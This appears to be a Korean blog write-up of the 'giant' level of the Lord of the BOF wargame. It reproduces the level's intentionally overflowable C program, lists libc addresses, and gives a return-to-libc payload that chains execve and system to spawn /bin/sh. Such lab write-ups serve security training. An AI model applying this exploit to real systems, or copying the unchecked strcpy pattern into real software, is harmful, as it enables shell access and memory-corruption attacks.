/*
The Lord of the BOF : The Fellowship of the BOF
- giant
- RTL2
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main(int argc, char *argv[])
{
char buffer[40];
FILE *fp;
char *lib_addr, *execve_offset, *execve_addr;
char *ret;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// gain address of execve
fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
fgets(buffer, 255, fp);
sscanf(buffer, "(%x)", &lib_addr);
fclose(fp);
fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
fgets(buffer, 255, fp);
sscanf(buffer, "%x", &execve_offset);
fclose(fp);
execve_addr = lib_addr + (int)execve_offset;
// end
memcpy(&ret, &(argv[1][44]), 4);
if(ret != execve_addr)
{
printf("You must use execve!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
system : 0x40058ae0
exit : 0x400391e0
/bin/sh : 0x400fbff9
execve : 0x400a9d48
execve함수의 ebp에 함수를 넣는다.
payload = "`python -c 'print "\x90"*44+"\x48\x9d\x0a\x40"+"\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40"+"\xf9\xbf\x0f\x40"'`"
'Wargame > lord of bufferoverflow' 카테고리의 다른 글
| Lord of bufferoverflow assassin (0) | 2017.08.26 |
|---|---|
| Lord of bufferoverflow giant (0) | 2017.08.26 |
| Lord of bufferoverflow darkknight (0) | 2017.08.22 |
| Lord of bufferoverflow golem (0) | 2017.08.21 |
| Lord of bufferoverflow skeleton (0) | 2017.08.21 |